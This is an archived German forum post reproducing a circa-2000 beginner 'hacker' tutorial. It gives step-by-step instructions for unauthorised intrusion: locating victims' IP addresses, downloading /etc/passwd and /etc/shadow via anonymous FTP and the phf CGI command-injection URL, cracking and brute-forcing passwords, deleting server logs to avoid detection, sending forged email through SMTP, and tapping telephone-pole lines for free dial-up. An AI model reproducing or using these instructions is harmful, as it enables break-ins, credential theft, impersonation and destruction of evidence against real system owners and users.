PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : HACKER WERDEN



HurricanX
11.08.2004, 20:03
Autor: Dr. B@stard <mailto:B@stard>
Organisation: xNs à Xtreme Net Security
Terror_gmbh@hotmail.com
Uin: 62991436



Dieses Dokument wurde am 30. April 2ooo geschrieben! Wenn Ihr fragen habt, mailt mir einfach, oder icqt ( wie shadow-killer) sagen würde (uin:62991436). Wenn Ihr was nicht versteht, dann lest es noch mal, sonst mailt ihr mir einfach


Wenn Ihr echte Hacker werden wollt, dann müsst Ihr sehr viel Lesen. Aber Lesen alleine
Hilft auch nichts - deshalb Learning by doing

Ihr alle braucht natürlich Winzip, Winace, Winrar das ihr aber sicher habt

Leute, diese Regel solltet ihr BEACHTEN

1. Beschädige niemals ein System. Das kann dich nur in Schwierigkeiten
bringen.
-----------------------------------------------------------------------------------------------
2. Verändere niemals System Dateien, außer die, die du brauchst, um
sicherzustellen, daß du nicht erwischt wirst, und die die dir in
Zukunft Zugang zu diesem Computer geben.
-----------------------------------------------------------------------------------------------
3. Gib niemals Informationen über deine Hacking Projekte jemandem, dem
du nicht bei deinem Leben vertraust.
-----------------------------------------------------------------------------------------------
4. Wenn du etwas auf BBS's (Bulletin Board Systems) veröffentlichst,
gehe nicht zu sehr in die Tiefe bei deiner Beschreibung der Hacking
Projekte. BBS's KÖNNEN vom Gesetz beaufsichtigt werden.
-----------------------------------------------------------------------------------------------
5. Benutze niemals echte Namen oder Telefonnummern wenn du etwas auf
BBS' veröffentlichst.
-----------------------------------------------------------------------------------------------
6. Hinterlasse niemals deinen Nicknamen (z.B. Dr. B@stard, Datamagnat, Sancho...)
auf einem System, in das du dich gehackt hast.
-----------------------------------------------------------------------------------------------
7. Hacke NIEMALS Regierungs Computer.
-----------------------------------------------------------------------------------------------
8. Sprich niemals über Hacking über deine private Telefonleitung.
-----------------------------------------------------------------------------------------------
9. Sei paranoid. Verstecke all dein Hacking Material in einem sicheren
Platz.
-----------------------------------------------------------------------------------------------
10. Um ein echter Hacker zu werden, musst du hacken. Du kannst nicht nur
herumsitzen und deine Zeit mit lesen und BBS's verbringen. Das ist
nicht das, worum es beim Hacken geht - But learning by doing
-----------------------------------------------------------------------------------------------



Hier sind die WICHTIGSTEN Ports, die man immer auf einen Ausdruck neben den Computer liegen haben soll


9---->Discard
15--->Netstat
19--->Chargen
21--->FTP Brauchen wir später noch
23--->TelNet
25--->Smtp
39--->RLP
53--->Nuke
67--->Boot
79--->Finger
80--->HTTP Sollte man auch wissen
87--->LinK
110-->POP3
113-->Ident
119-->Nntp
129-->Nuke
137-->Nuke
138-->Nuke
139-->Nuke
513-->Login
515-->Pkill
533-->Netwall
560-->Rmonitor
561-->Monitor
1080->Firewall 5580->mil. Http
8080->Http|mil.Http
12345-> netbus

--------------------------------------------------------------------------------
Noch was: Versucht anonym zu bleiben!! Vielleicht werde ich so ein Tool auf die xNs Homepage fixen



--------------------------------------------------------------------------------

1)
So geht man bei einem Hack vor:

- Anonymisieren
- Das Ziel auskundschaften
- Die Sicherheitslöcher stopfen
- Die Sicherheitslöcher ausnutzen und eindringen
- Den Hack verüben
- Spuren verwischen.


Es Gibt 2 Angriffsarten:

1. Der stille Angriff:
man macht alles auf lange Zeit verteilt, damit es nicht so auffällt, man plant alles, sorgfältig,
und macht dann den hack, und verwischt seine spuren, und verschwindet lautlos, ein perfekter Hack!
2. Der Blitzangriff:
man platz rein, untersucht alles, und zerstört das Ziel, dann stellt man ein Chaos, her
(z.B man verschiebt Daten,...) und sorgt dafür, das man sich im Chaos schnell verziehen kann nicht so
meine Art, aber ab und zu auch gut!

Was tun, wenn einem der Gegner entdeckt??
dann verdammt reiss den Stecker raus, oder du kanns es vergessen!!
er darf dich sehen, aber bis er um die Kante rum is, um die du verschwunden bist, darf er dich nicht mehr
sehen! Raus aus dem Netz, und lass es ein paar Tage in ruhe! und komm nie wieder auf die Idee, hier wieder
hinzukommen!! nach einiger Zeit wird sich das ganze gelegt haben, und das Ziel wird besseren Schutz eingebaut haben....




2)
Ohne Programme zu Hacker ist ein langwieriger Vorgang, der viel können und sehr viel Zeit
erfordert.
einmal zum ip sniffen ( per icq)

schreibe den User eine massage. Dirket danache gehst du in die ms-dos eingabeaufforderung
und schreibst

netstat -n

dann listet es dir eine Liste (am rechten Rand, am linken das ist deine) mit Ip's auf

Tja so einfach ist es.

Oder du schreibst netstat -a hinen, was aber die Blödere Methode ist)

tja, dann suchst du nur mehr die richtige ip heraus.





-----------------------------------------------------------------------------------------

3) Ip sniffen, wenn der User kein Icq hat.

Ok, du musst wissen, dass er online ist, du musst seine Email Adresse haben,
er muss deine haben und du (Ihr) musst noch wissen dass er den Outlook express hat.

Naja, wenn du dann weißt, dass er online ist, meine zu Ihm ( per Anruf oder so(das bleibt
euch überlassen)) dass er dir ne mai schreiben sollte

Steige in den Outlook express ein.
Ding, das mail ist da
Drücke auf den Name die Rechte mousetaste - details dann kommt so was in der Art:



From tothsa@netcologne.de Thu Mar 23 09:32:58 2000
Received: from [194.8.194.103] by hotmail.com (3.2) with ESMTP id MHotMailBAA39F2D002BD82197A0C208C267C0DD0; Thu Mar 23 09:28:14 2000
Received: from j1w7j0 (dialp-184.netcologne.de [194.8.195.184])
by mail2.netcologne.de (8.9.3/8.9.3) with SMTP id SAA09739
for <Terror_gmbh@hotmail.com>; Thu, 23 Mar 2000 18:27:54 +0100 (MET)
Message-ID: <001001bf94ed$204647a0$b8c308c2@j1w7j0>
From: "Cyb3rk!llah" <tothsa@netcologne.de>
To: "mh CREW" <Terror_gmbh@hotmail.com>
References: <000801bf925c$31ee2380$96e90ec3@oemco


Naja Leute, hat es schon gefunkt, was die ip ist



Yo, sie steht neben:
Received from: [194.8.194.103] ( is die ip von Cyberkilla vom Thu Mar 23 09:32:58 2000)
du kannst hier noch was entnehmen:<tothsa@netcologne.de>
dass sein anbieter netcologne.de ist

*gr**
tja, so einfach ist es die ip zu sniffen!!
----------------------------------------------------------------------------------------
In eurer Firewall zeigt es ne ip an, die euch versucht zu Hacken???
Kein Problem, durch diese linkZ, könnt Ihr herausfinden , wer sein Provider ist
**gr** _
Ps: Loadet euch die Lockdown von der xNs herunter


http://www.nic.de/whois.html
Wie de schon sag, wenn die Person aus Deutschland kommt
· <http://www.arin.net/whois/arinwhois.html>
·
#wenn die Person aus Amerika kommt

*
http://www.ripe.net/db/whois.html
Wenn wir glauben, dass die Person aus Europa oder Afrika kommt

* http://www.apnic.net/reg.html
Wenn die Person aus asian kommt





----------------------------------------------------------------------------------------
Ja, Leute kommen wir zum ftp Hack ;-)
Zuerst brauchen wir noch ein paar Dinge, bevor wir richtig loslegen:
* einen FTP Client (ich bevorzuge den von Windows)
* einen Password Cracker (John The Ripper)
* eine möglichst grosse Wordlist oder einen Dictionary Maker
(dieser Punkt fällt weg, wenn wir einen BruteForce Password Cracker haben)
* viel Zeit


Probieren wir es zuerst mit der einfachsten Methode, indem wir unseren FTP Client starten und eine Verbindung
zum "Opfer - FTP" herstellen.
Dort versuchen wir uns nun als "anonymous" einzuloggen und senden als Passwort eine falsche E-Mail Adresse.
Hierzu gehen wir in die DOS-Eingabeaufforderung und tippen ein (nach jeder Zeile Return drücken):

ftp
open target.com
anonymous (hier teilen wir dem Server unseren Benutzernamen mit)
Bill@Microsuck.com (hier teilen wir dem Server "unsere" E-Mail Adresse mit)
get /etc/passwd (wir downloaden das file mit dem Namen passwd)
get /etc/shadow (falls die passwd nicht existiert, downloaden wir die shadow)
disconnect (trennt die Verbindung zum Server)
quit (schliesst den FTP Client)
Sollten wir hier schon Glück gehabt haben, ist der Rest ein Kinderspiel.
Wir besitzen schonmal das passwd file und müssen dieses nur noch cracken. Dazu nehmen wir unseren Cracker und
lassen ihn entweder nach der Dictionary oder Brute Force Methode das Passwort entschlüsseln.
Das Ergebnis was wir bekommen, ist das Passwort des "root" Account (unter Novell: Supervisor; unter NT: Administrator),
mit dem wir nun wieder eine neue FTP Verbindung zu unserem Server herstellen und uns als root und dem frisch gecrackten
Passwort anmelden.

Sollten wir allerdings an der ersten Methode gescheitert sein, können wir uns einen kleinen Bug in einigen UNIX Versionen
zu Nutze machen. Hierzu benötigst du nur noch einen Webbrowser, in den du folgende Adresse eingibst
(anstelle des www.target.com einfach den Domainnamen eintragen):
http://www.target.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
bzw.
http://www.target.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/shadow

Wiederum kann es hier klappen, dass wir den Inhalt der passwd oder shadow file sehen. Sollte dies der Fall sein, so
speichern wir diese und cracken sie nur noch mit Hilfe unserer Proggies, loggen uns als root ein und treiben nun n
ach belieben
dort unser Spielchen auf dem FTP Server.

Es kann trotzdem geschehen, dass wir noch durch keine der beiden Methoden Erfolg gehabt haben ;-(
An dieser Stelle sollten wir es mit dem Brute Force Hacking probieren.
Brute Force bedeutet ganz einfach, ALLE möglichen Kombinationen zu probieren, was sehr zeitaufwendig sein kann und wird.
TIP: UNIX Passwörter sind maximal 8 Zeichen lang !!!


So, hiermit hätten wir dann auch das Thema mit dem FTP / Website hacken abgeschlossen.
Eigentlich ist das ganze ziemlich simpel.


Es gilt für jede Transaktion: Solltet ihr erfolgreich in ein System mit einem Administrator Account eingebrochen sein,
killt zuerst die LOG Files, denn diese enthalten, was wirklich geschehen ist. Und wir wollen doch wirklich nicht, dass wir
unseren Gegnern eine Spur hinterlassen.
Alle Web-Server speichern irgendwo LOG-Files, indenen steht, wer sich wann, mit welchem Namen, mit welcher IP von wo aus
eingeloggt hat.

Wenn Ihr es nicht verstanden habt, mail mir einfach: Insane_doktor@hotmail.com <mailto:Insane_doktor@hotmail.com>





--------------------------------------------------------------------------------------
oder hier noch ein Beispiel:
Sagen wir mal, Du benutzt Netscape. Du gibst diese URL in die Location-Zeile ein:
http://www.well.com/user/woa. Hiermit sendet Netscape (so schätze ich) einen Ping
dorthin, um sicher zu stellen, dass der Server "alive" ist. Das ist damit gemeint,
wenn es heisst "contacting www.well...". Du wirst dies unten in der Statusleiste
des Browsers erkennen.
www.well.com antwortet daraufhin, "Ich lebe! Was willste?". Nun sagt der Netscape
Browser, "ich will www.well.com/user/woa". Der Server verarbeitet diese URI (Universal
Resource Identifier) und findet dann die URL, die Du suchst und sendet die Quelle
an Dich. Der Browser übersetzt dieses Medium in jenes Format, welches dafür vorgesehen
war, so auszusehen. Mit Telnet können wir das gleiche machen! (WOW)
Um dieselbe URL zu betrachten, müssen wir dies tun:

Telnet www.well.com :80 (telneted an well.com am Port 80, welches auch normalerweise
der HTTP Port ist)

Der Server beginnt jetzt sein kleines Gequassel, von wegen "alive" uns so.
Jetzt gib das hier ein:

GET /user/woa HTTP/1.1 Host:www.well.com

Dann drücke zweimal Enter und der HTML-Quelltext wird an Dich gesendet.
Da ich jetzt damit begonnen habe, in HTTP herumzupfuschen, belasse ich es auch dabei.

Zu Deiner Information, ich habe bemerkt, dass Du, wenn Du eine Site wie www.cnet.com
oder www.yahoo.com besuchst, diese keine Referenz zu einem Dokument geben. Der Server
schaut automatisch nach den Gast-Dateien, welche üblicherweise index.html sind.
Ist dies der Fall, dann belasse den Pfadnamen mit einem "/", der den Root bezeichnet
(z.B. GET / HTTP/1.1)

Tja, so ist es halt :-)))





--------------------------------------------------------------------------------


So, wenn ihr bis da nicht mitgekommen seit, dann mailt mir doch: Terror_gmbh@hotmail.com


solala, was machen wir jetzt
ich schätzte ich erkläre euch, wie man sich mit nen Icq- User per Telnet verbindet

Ok, als ersters nimmst du den icq -user und schreibst ihn ne massage.
nimm Keine anderen an, und sende auch keine anderen (ausser zu dem Lama)

Sende zb :
Hi fuzzbrain


Gleich danach gehst du in die ms-dos eingabeaufforderung und schreibst
netstat -a ( es überprpüft die Netztwerkumgebung)

es kommt

Active Connections

Proto Local Address Foreign Address State
TCP Demon:0 0.0.0.0:0 LISTENING
TCP Demon:1029 0.0.0.0:0 LISTENING
TCP Demon:1030 0.0.0.0:0 LISTENING
TCP Demon:1090 0.0.0.0:0 LISTENING
TCP Demon:1091 0.0.0.0:0 LISTENING
TCP Demon:1098 0.0.0.0:0 LISTENING
TCP Demon:1099 0.0.0.0:0 LISTENING
TCP Demon:1093 0.0.0.0:0 LISTENING
TCP Demon:1090 server5.sys.www.ozemail.net:80 CLOSE_WAIT
TCP Demon:1091 server5.sys.www.ozemail.net:80 CLOSE_WAIT
TCP Demon:1098 server5.sys.www.ozemail.net:80 CLOSE_WAIT
TCP Demon:1099 m54-max35.telekom.at :1054 ESTABLISHED
TCP Demon:137 0.0.0.0:0 LISTENING
TCP Demon:138 0.0.0.0:0 LISTENING
TCP Demon:nbsession 0.0.0.0:0 LISTENING
TCP Demon:1029 0.0.0.0:0 LISTENING
TCP Demon:1093 0.0.0.0:0 LISTENING
TCP Demon:nbname 0.0.0.0:0 LISTENING
TCP Demon:nbdatagram 0.0.0.0:0 LISTENING

nagut, der user ist bei Telekom dabei

jetzt schreibt einfach ping m54-max35.telekom.at:1054 hinein und ihr habt die ip

Pinging m54-max35.telekom.at [195.76.151.67] with 32 bytes of data:
Reply from 165.76.151.67: bytes=32 time=1281ms TTL=39
Request timed out.
Reply from 209.76.151.67: bytes=32 time=1185ms TTL=39
Request timed out.

Ping statistics for 209.76.151.67:
Packets: Sent = 4, Received = 2, Lost = 2 (50% loss),
Approximate round trip times in milli-seconds:
Minimum = 1185ms, Maximum = 1281ms, Average = 616ms

Tja, die ip ist 195.76.151.67

nun besorgt ihr euch nen portscanner (astalavista.box.sk), scannt seine Ports!! Durch dir offenen könnt ihr
viel anfangen





--------------------------------------------------------------------------------
_
Fake Mails
(unter falschen Absender)
Ganz einfach hier ist die lösung:

ls erstes greift ihr mit Telnet über Port 25 auf einen beliebigen Web-Server zu.
Dies geschieht indem ihr in der DOS-Eingabeaufforderung eintippt:
telnet web.server 25
Noch alles klar?

Wenn ihr dort im System seit, nutzt folgende Kommandos um eine Fake Mail zu versenden:
mail from Dr. Bastard@xns.com


Jetzt brauchen wir natürlich jemanden, dem wir eine Fake Mail schicken wollen.
Das System wartet auf folgende Eingabe:
rcpt to: empfänger@der.mail.com
Wiederum gilt hier eine E-Mail Adresse einzutragen, und zwar die der die Fake-Mail erhalten soll.

Nun gebt ihr das Wort "data" ein.

Erst jetzt folgt eure eigentliche Nachricht.
Tippt sie ein und dann in einer neuen Zeile einfach "." eingeben um die Fake-Mail zu versenden

Noch ein kleiner Tipp von xNs zu xNs'ler:
Wenn ihr ganz anonym bleiben wollt, geht auf die Seite um fake
E-Mails verschicken, die eure wahre Identität nicht preisgeben:
http://www.anonymizer.com


Hier noch einige Telnet kommandos

c Mit einem Host verbinden.
stat Zeigt den Netzwerk Port.
full Netzwerk Echo.
half Terminal Echo.
telemail Mail. (benötigt ID und Passwort)
mail Mail. (benötigt ID und Passwort)
set Wähle die PAD Parameter aus.
cont Weiter.
d Verbindung beenden.
hangup Legt den Hörer auf.
access Telenet Accout. (ID und Passwort)






--------------------------------------------------------------------------------
Ok, Ihr habt doch schon sicher was im Internet von Sogenannten Hacktests gehört
Ich habe hier in einen Turi. beschrieben, wie man sie überwindet
Du hast sicher schon öfter was von "Hacker-Tests" im Web gehört und weisst nicht wie man viele davon lösen kann ?
Das ist eigentlich ganz simpel,
denn bei den leichteren Hacker-Tests sind die Passwörter gleich mit auf der HTML-Datei gespeichert ...

So , Wie bekommen wir nun Zugang ??
Alls erstes auf Abbrechen klicken, wenn die Abfrage erfolgt !!

Enweder wir haben den MS Internet Explorer und klicken nun auf die Menüpunkte
"Ansicht" -> "Quelltext anzeigen" oder wir lassen uns den Queltext anders anzeigen .
(Müßt ihr halt die Menüleisten abklappern ...)

Nun sehen wir etwa sowas (in diesem Fall nur das nötigste , sonst kann da noch mehr stehen):

<html>
<head>
<meta http-equiv="Content-Type"
content="text/html; charset=iso-8859-1">
<meta name="GENERATOR" content="Microsoft FrontPage Express 2.0">
<title>Nun , wirds bald ???</title>
</head>
<body bgcolor="#000000" text="#FFFFFF" link="#FFFFFF" onload=checkPasswd()
vlink="#FFFFFF" alink="#FFFFFF">


<script language="JavaScript" languge="JavaScript"><!--
//Programm vestecken
function checkPasswd(){
var password=prompt('Wie lautet das Passwort ?');
if (password =='Dr. B@stard'){
location.href ="geheim.htm";
}
else{
alert('Falches Passwort ...');
}
}
//Ende Programm verstecken
// --></script></p>
</body>
</html>

So, nun suchen wir uns den wichtigen Teil ( meißt Scripte) in diesem Fall
ist es ein Java-Script .
Das erkennt man an der Zeile


<script language="JavaScript" languge="JavaScript"><!--
Aber nun der sooo wichtige Abschnitt :

function checkPasswd(){
var password=prompt('Wie lautet das Passwort ?');
if (password =='Dr. B@stard'){
location.href ="geheim.htm";

Jetzt wissen wir das dies hier wichtig ist, aber wieso ?
Um das zu erfahren erst mal die Zeilen genauer ansehen ...

function checkPasswd(){
aktiviert den Passwort-Schutz

var password=prompt('Wie lautet das Passwort ?');
Fragt dich nach dem passwort

if (password =='Dr. B@stard'){
Verrät uns, das das Passwort "Dr. B@stard" ist .

location.href ="geheim.htm";
Gibt uns an auf welche Seite wir gelangen, wenn das Passwort richtig ist
Also einfach die Seite nochmal öffnen und das richtige Passwort eingeben ;-)


Ps. wenn bei Klick Rechter Maustaste eine Meldung kommt wie zb.
" Diese Funktion ist deaktiviert" dann haltest du
einfach die Maustaste fest, drückst enter und lässt die Rechte maustaste los.
Dann kommt das Menü schon






--------------------------------------------------------------------------------

Nochwas
um gute Hacker zu werden loadet euch die Rainbowbooks herunter!! Hier eine Beschreibung:


Orange 1 DOD Trusted Computer Systems
Grün DOD Passwort Management
Gelb Computer Sicherheits Voraussetzungen
Gelb 2 Computer Sicherheits Voraussetzungen
Gelb-Braun Prüfung in Trusted Systems verstehen
Hellblau Trusted Produkt Festsetzung
Leucht-Orange Diskreten Zugang verstehen
Teegrün Glossar der Computerterme
Orange 2 Konfigurationen verstehen
Rot Interpretation der Festsetzung
Burgund Entwurfsdokumentation verstehen
Dunkel-Lavendel Trusted Distrobution verstehen
Venedig-Blau Computer Sicherheits Untersysteme
Aqua Sicherheitsaufbau verstehen
Dunkelrot Interpretation der Umgebung
Pink Einschätzung der Instandhaltungsphase
Purpurrot Formale Bestätigungssysteme
Braun Trusted Anlagen verstehen
Gelb-Grün Trusted Anlagen Handbücher schreiben
Hellblau Identifikation und Beglaubigung in Trusted Systems verstehen
Blau Produkt Festsetzung Fragebogen
Grau Zugriffskontroll-Liste auswählen
Lavendel Data-Base Verwaltungs Handbuch
Gelb 3 Trusted Wiederherstellug verstehen
Purpur 1 Anleitung zur Systembeschaffung
Purpur 2 Anleitung zur Systembeschaffung
Purpur 3 Anleitung zur Systembeschaffung
Purpur 4 Anleitung zur Systembeschaffung
Grün Daten Remanenzen verstehen
Scharfes Pfirsich Sicherheits Features schreiben
Türkis Informationssicherheit verstehen
Violet Kontrollierte Zugangsprotektion
Hellpink Verborgene Kanäle verstehen


Man kann sie sogar von der xNs (www.xtremenet.de <http://www.xtremenet.de>) homepage downloaden







----------------------------------------------------------------------------

Du willst doch mal wissen, wie man billiger im Internet surf!!
ich hoffe nur, du hast nen Laptop

OK, du kannst ja dein Modem ( wie dir sicher bekannt ist) ueber andere Telefonleitungen verbinden
. Wenn du dein Modem zu einer Telefonzelle verbinden willst,
mache es spät in der Nacht, und mit einer vereinzelten Telefonzelle. Schaue
auf die Seite des Telefons und du solltest eine kleine Metallschachtes (die
die Telefonkabel beinhaltet) sehen. Irgenwo sollte es in eine kleine Box münden.
Nimm die Box ab, und du hast einen super Telefonanschluß. Das abnehmen der Ab-
deckung kann etwas kompiziert sein, aber nichts ist unmöglich. Wenn du jetzt dein
Modem mit einem anderem Telfon verbinden willst, brauchst du ein Paar rote und
grüne Krokodilklemmen, und einen extra Modemstecker für deinen LapTop.
Schneide nun das Ende des Modemsteckers ab, und du siehst ein rotes, ein grünes
und 2 andere Kabel, die du ignorieren kannst. Schließe die rote und grüne
Krokodilklemme an die gleichfarbigen Kabel an. Nun mußt du einen Telefonpol oder
eine kleine grüne Box, die im Boden ist (sie sollte ein Bell Systems Logo haben),
finden.
Bei einem Telefonpol öffne die kleine Box, in die ein Bündel Kabel mündet. Auf der
rechten Seite solltest du 2 Schrauben (genannt "Terminals") sehen, die in rotes bzw.
grünes Kabel umgewickelt haben. Verbinde nun wieder die Krokodilklemmen mit den
gleichfarbigen Kabeln. Nun solltest du ein Freizeichen hören. Wenn nicht, paß auf,
daß sich die Klemmen nicht gegenseitig berühren, und daß die Klemmen mit dem
abisolierten Ende der Kabel verbunden sind.
Tja, Bear 14, Schon ist die Telefonrechnung herunten (vorrausgesetzt du hast nen Laptop)






---------------------------------------------------------------------------

Hier habt ihr noch ne Menge ip's


132.96.x.x ???

194.230.x.x ???

149.225.x.x MSN

212.172.x.x Nacamar

195.93 .x.x AOL Deutschland

171.224.x.x AOL Deutschland

152.166.x.x AOL

152.170.x.x AOL

152.172.x.x AOL

152.205.x.x AOL

152.207.x.x AOL

152.170.x.x

62 .180.x.x Planet Intercom

169.120.x.x

62 .69.140.x AddCOM

24 .188.x.x

171.223.x.x

213. 6 .x.x Freenet

212.81 .x.x Freenet

62 .150.x.x T-Online
bis 62 .255.x.x
193.159.x.x T-Online

195. 3 .x.x T-Online

149.99 .130.x Kanadischer Provider
bis 149.99.150.x
212.81 .x.x Mobilcom

207.226.x.x Mobilcom

62 .96 .x.x I-net

62 .52 .x.x Commundo

62 .52 .x.x Debitel

145.253.x.x Arcor

212.202.x.x Germany Net

62 .157.x.x 1 & 1

212.181.x.x 1 & 1

152.203.x.x Compuserv

134.95 .x.x Uni Köln

134.91 .x.x Uni Duisburg



---------------------------------------------------------------------------
Zum Schluss noch ein Kapitel:
Wie komme ich an die netten xxx Bildchen ran?
a) du zahlst wie dumm und wirst von den bildern glücklich
b) du hackst einfach

Schon entschieden?
Ok, los geht’s
Wir brauchen
a) wwwhack
b) netscape

Nun müsste ein Fenster kommen wo man den Name und dann Passwort eines Members eingeben
Muss. Wie drücken rechte maustaste, und schauen nach wie der Link geht! Diesen Link geben wir dann in wwwhack ein. Dann lassen wir unsere Pwd liste durchlaufen ( dass kann einige Zeit dauer). So, nachdem wir das pwd haben, können wir schon………



Du bist noch ein TOTALER Anfänger und willst ne Hp hacken?
Du hast unsecure und kennst dich nicht aus?
Hier die Lösung

Computer: Hier schreibst du die Url von der Homepage hinein zb. www.geocities.com/iamstupid
Der Anmeldenamen ist: Iamstupid, und jetzt hast du die möglichkeit dir auszusuchen, obst du brute force oder ne pwd liste nimmst. (ne pwd liste bevorzuge ich
Reconnecting on disconnect hackeln wir an
Die Bruteforce optionen brauche ich glaube ich nicht zu erlkären
Ja, das wars!!!!


Hier sollte eigentlich ein Pwd-Liste stehen, aber dann wäre das Turitorial ein bisschen zu groß (ca. 12000 Seiten **gr)( Die Pwd liste hat 8,5 Mb lol)
Wenn Ihr sie aber trotzdem haben wollt, dann mailt mir
Terror_GmbH@hotmail.com


Hier noch einige gute Hackerseiten:
www.xtremenet.de <http://www.xtremenet.de>
www.busch-hacker.de <http://www.busch-hacker.de>
www.hackertool.de
www.hacktools.de <http://www.hacktools.de>
raw.tsx.org
thz.cxa.de
http://195.70.239.68/~sol/s~cgi/tl2/cgi-bin/toplinks.cgi
ist ne gute Topliste, die Mir gehört <freu>
www.kreptocrew.de <http://www.kreptocrew.de>
www.v-n-h.de <http://www.v-n-h.de>
www.d-h-c.de <http://www.d-h-c.de>

Wenn deine Addi hies stehen soll, mail mir


Hier noch ein paar gute appz addressen:
Come.to/uds2000
Heimwaren.tsx.org

Written by Dr. B@stard

www.xtremenet.de




Grüße an: DataMagnat à Ex- Leader von Uho leider ist er vor kurzem ausgestiegen L
Sancho
Big_Bishop
Eichi à Du eute mistsau **gr**
Dani
Foo
Firefucker nope, du bist kein Feuerficker
Ali
Neumi
The Hacker
Bori
Billy the Hacker
Shadow-killah





Und an die ganzen, die ich vergessen habe
Bitte nehmt es mir nicht übel J
Und noch was: Wenn auf einen Fremden Pc obenseit, baut keinen Scheiss!! Es bringt euch nur noch mehr Schwierigkeiten!

Wenn du ein GUTER Hacker bist, der Lust hat, bei ner Organisation mitzumachen, maile mir doch (bei xtremenet (www.xtremenet.de <http://www.xtremenet.de>)


Deshalb immer auf der xNs homepage schauen, ob Dr. B@stard nicht was neues geschrieben hat --> xNs www.xtremenet.de

Bitte lasst einfach meinen Namen hier unten stehen, dass ist meine einige bitte!!! Verändert auch den Text nicht!

This Text is written by Dr. B@stard --> Dr. B@stard ist Memba von xNs (Xtreme Net security) (www.xtremenet.de)


Naja dann, viel spass beim Hacken
Only Lamerz destroys your things, and WE ARE HACKERZ!!!


Mfg: Dr. B@StaRd
(uin:62991436)



30.4.00